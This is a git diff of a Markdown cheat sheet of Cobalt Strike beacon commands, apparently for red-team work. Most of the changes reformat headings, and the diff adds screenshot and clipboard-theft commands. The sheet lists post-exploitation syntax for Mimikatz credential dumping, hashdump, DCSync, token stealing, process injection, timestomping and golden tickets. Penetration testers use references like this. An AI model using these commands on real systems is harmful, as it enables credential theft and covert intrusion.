4
4
5
5
## Command References
6
6
7
- #### Beacons
7
+ ### Beacons
8
8
##### Sleep
9
9
``` css
10
10
sleep 60 50 ; Sleep 60 sec with 50% of jitter (Call back between 30 to 60 secs randomly)
11
11
```
12
12
13
- #### Command Execution
13
+ ### Command Execution
14
14
##### Default
15
15
``` css
16
16
run [command ]
@@ -40,63 +40,63 @@ execute-assembly [/path/to/your.exe] ; Running it from your localhost
40
40
shell [command ] [args ]
41
41
```
42
42
43
- #### Session Passing
43
+ ### Session Passing
44
44
```css
45
45
spawn [x86 |x64 ] [Listener ]
46
46
inject [PID ] [x86 |x64 ] [Listener ]
47
47
```
48
48
49
- #### Parent Process Modification
49
+ ### Parent Process Modification
50
50
```css
51
51
ppid [Choice of your parent process (e.g., iexplore.exe)]
52
52
spawnto [x86 |x64 ] [New parent process ]
53
53
```
54
54
55
- #### SMB Beacn
55
+ ### SMB Beacn
56
56
```css
57
57
spawn [SMB-Listner-Name ] ; Spawning a peer-to-peer ("P2P") SMB beacon
58
58
inject [PID ] [x86 |x64 ] [SMB-Listner-Name ] ; Useful when trying to spawn P2P beacon as different user context
59
59
```
60
60
61
- #### TCP Beacn
61
+ ### TCP Beacn
62
62
```css
63
63
spawn [TCP-Listner-Name ] ; Spawning a peer-to-peer ("P2P") TCP beacon
64
64
; TCP beacons can be also run locally by clicking "Bind to localhost only" on GUI
65
65
inject [PID ] [x86 |x64 ] [TCP-Listner-Name ] ; Useful when trying to spawn P2P beacon as different user context
66
66
```
67
67
68
- #### Credentials and Hashes
68
+ ### Credentials and Hashes
69
69
```css
70
70
logonpasswords ; Run Mimikatz
71
71
hashdump ; Get SAM database hashes
72
72
```
73
73
74
- #### Mimikatz
74
+ ### Mimikatz
75
75
```css
76
76
mimikatz [command ] [args ] ; Runs a Mimikatz command
77
77
mimikatz ![command ] [args ] ; Elevate to SYSTEM and run Mimikatz command
78
78
mimikatz @[command ] [args ] ; User current token to run Mimikatz command
79
79
```
80
- #### DCSync
80
+ ### DCSync
81
81
```css
82
82
dcsync [domain ] [DOMAIN\u ser ]
83
83
```
84
84
85
- #### File Download
85
+ ### File Download
86
86
```css
87
87
download [file ]
88
88
cancel [file |*]
89
89
downloads
90
90
View --> Downloads --> Sync Files
91
91
```
92
92
93
- #### File Upload
93
+ ### File Upload
94
94
```css
95
95
upload [/path/to/file ]
96
96
timestomp [Destination ] [Source ] ; Changing file's timestamps (* Do not recommend using it during the engagement)
97
97
```
98
98
99
- #### Token Stealing
99
+ ### Token Stealing
100
100
``` css
101
101
ps ; List process
102
102
steal_token [PID ] ; Stealing token
@@ -109,7 +109,7 @@ make_token DOMaIN\user password ; Create a token. So when you do a m
109
109
; (maybe against DC) you will see that the maked token user.
110
110
```
111
111
112
- #### Kerberos Tickets
112
+ ### Kerberos Tickets
113
113
```css
114
114
klist ; See your current Kerberos tray
115
115
kerberos_ticket_purge ; Purge tickets
@@ -120,3 +120,16 @@ kerberos_ticket_user [/path/to/file.ticket] ; Load a ticket
120
120
- Domain SID [whoami /user + drop last number ]
121
121
- NTLM hash of krbtgt user from DC
122
122
```
123
+
124
+ ### Screenshots
125
+ ```css
126
+ screenshot [pid ] <x84|x64>
127
+ screenwatch [pid ] <x84/x64>
128
+ printscreen
129
+ ```
130
+
131
+ ### Keylogging / ClipboardTheft
132
+ * [Start-ClipboardMonitor.ps1 ](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Start-ClipboardMonitor.ps1 )
133
+ ```css
134
+ psinject <Process ID> x64 Start-ClipboardMonitor -CollectionLimit 5
135
+ ```
0 commit comments